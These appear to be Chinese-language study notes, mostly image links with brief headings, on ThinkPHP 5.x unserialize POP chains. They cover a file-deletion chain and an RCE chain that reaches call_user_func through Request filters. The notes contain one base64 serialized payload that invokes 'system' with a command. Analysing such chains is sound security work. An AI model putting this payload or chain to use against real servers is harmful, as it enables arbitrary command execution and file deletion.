一、文件删除利用链分析
data:image/s3,"s3://crabby-images/9e54b/9e54b67df9bbad422da14f9a343d33e2fe50f858" alt=""
1、__destruct发现调用$this->removeFiles();
data:image/s3,"s3://crabby-images/db1b5/db1b5daaedc62858d266e3eaf71779ef5243c629" alt=""
2、removeFiles();函数方法file_exists,@unlink($filename);文件删除功能
data:image/s3,"s3://crabby-images/f515f/f515f2499ed061e568ebc3e6813da337ea742c89" alt=""
3、unserialize(base64_decode($_GET['id']));
有可控变量
data:image/s3,"s3://crabby-images/41b41/41b4132847700d81e5c654813a56070c30dcac75" alt=""
4、pop文件删除利用链的使用
data:image/s3,"s3://crabby-images/ab172/ab172722d83f78d04d5f76d65738cd24dd4add22" alt=""
只有在这个类中调用
Files可控数组
data:image/s3,"s3://crabby-images/001f6/001f678fc83c905e5aa1f78a0241c8f1836f6c8c" alt=""
data:image/s3,"s3://crabby-images/90118/90118671e495815bc90677069055647f805e1654" alt=""
5、Poc实现
data:image/s3,"s3://crabby-images/30c33/30c33f0e7561587bcaab1e95ebceb03bb668f054" alt=""
路由关系
application/index/controller/Index.php
6、动态调试
data:image/s3,"s3://crabby-images/69553/6955316250b67dd7e5b0cc00f72d25bb1bdeb433" alt=""
data:image/s3,"s3://crabby-images/42a6f/42a6f7445159594e11ae45cb0ca9d4baebe97446" alt=""
二、RCE利用链分析
data:image/s3,"s3://crabby-images/137cb/137cb848cdd71d70a0b36288a2558eed943d52e5" alt=""
data:image/s3,"s3://crabby-images/e6f6f/e6f6f5dfdc6cb7f1c1a723f16ff198e43b41fa33" alt=""
data:image/s3,"s3://crabby-images/6b3b0/6b3b067747a534d17c45d6b87767844c580f4b48" alt=""
1、动态调试分析
data:image/s3,"s3://crabby-images/edb8c/edb8cc3e6c924d9be0cc56ca5fef387bc2b6e6a2" alt=""
TzoyNzoidGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzIjoxOntzOjM0OiIAdGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzAGZpbGVzIjthOjE6e2k6MDtPOjE3OiJ0aGlua1xtb2RlbFxQaXZvdCI6Mjp7czo5OiIAKgBhcHBlbmQiO2E6MTp7czo2OiJjb2xlYWsiO2E6MTp7aTowO3M6MDoiIjt9fXM6MTc6IgB0aGlua1xNb2RlbABkYXRhIjthOjE6e3M6NjoiY29sZWFrIjtPOjEzOiJ0aGlua1xSZXF1ZXN0Ijo1OntzOjc6IgAqAGhvb2siO2E6MTp7czo3OiJ2aXNpYmxlIjthOjI6e2k6MDtyOjg7aToxO3M6NjoiaXNBamF4Ijt9fXM6OToiACoAZmlsdGVyIjthOjE6e2k6MDtzOjY6InN5c3RlbSI7fXM6MTM6IgAqAG1lcmdlUGFyYW0iO2I6MTtzOjg6IgAqAHBhcmFtIjthOjE6e2k6MDtzOjc6Im5vdGVwYWQiO31zOjk6IgAqAGNvbmZpZyI7YToxOntzOjg6InZhcl9hamF4IjtzOjA6IiI7fX19fX19
从下到上的利用链利用
data:image/s3,"s3://crabby-images/fe186/fe18601d7f513d571897dbdf7a8bf1a688b8cbeb" alt=""
1、文件删除poc-》rce利用
//__destruct->removeFiles->file_exists->
$filename未对象时候触发__toString
data:image/s3,"s3://crabby-images/133c7/133c7264e38a11233e7f5ce02f1ae848d98867fc" alt=""
2、__toString利用链分析
data:image/s3,"s3://crabby-images/8d912/8d9123a96d1b9d8dcda4a383ddce18186a882fa4" alt=""
data:image/s3,"s3://crabby-images/e0f63/e0f63f6336107f046c37d5d85ff831e1e15a99ee" alt=""
data:image/s3,"s3://crabby-images/0f5d2/0f5d297332e86e39dc198c6382c5554cba243831" alt=""
//$relation可控,找到一个没有visible方法或不可访问这个方法的类时,即可调用_call()魔法方法
3、call利用链分析
data:image/s3,"s3://crabby-images/ff9d6/ff9d6f2c9eb160f48b519ea0b3c67bebf4ec96ec" alt=""
hook[$method], $args
-》$method, $args
4、逆向分析call_user_func
data:image/s3,"s3://crabby-images/04f29/04f295ac59c068f275f59aa21624a577482e1131" alt=""
data:image/s3,"s3://crabby-images/707b5/707b5f867b840809b05c6f6630ec50c9bf41d433" alt=""
filterValue
data:image/s3,"s3://crabby-images/30a3b/30a3b7c25eb5d28b05ced4bdee1487ed503e83a6" alt=""
data:image/s3,"s3://crabby-images/399bb/399bbe2fc1f2c972f14a20419e38547c8f84ce47" alt=""
5、input方法触发分析
data:image/s3,"s3://crabby-images/e6c86/e6c8693fa263d2589576087d42d098d1766b1cc4" alt=""
data:image/s3,"s3://crabby-images/7f429/7f42980b80fb9e30b3a56e49bd293207c5a79980" alt=""
6、param被谁触发
被isAjax触发了
data:image/s3,"s3://crabby-images/50bb8/50bb89d18614f43f8fcf4912417afcacbc2e5b30" alt=""
7、call方法调用了
data:image/s3,"s3://crabby-images/2b586/2b5860a34291d977a46d9aea9f5b4ede8e6c5da4" alt=""
8、利用链不会xie
data:image/s3,"s3://crabby-images/a8556/a8556d4285af8646dd41813a000a79712969b252" alt=""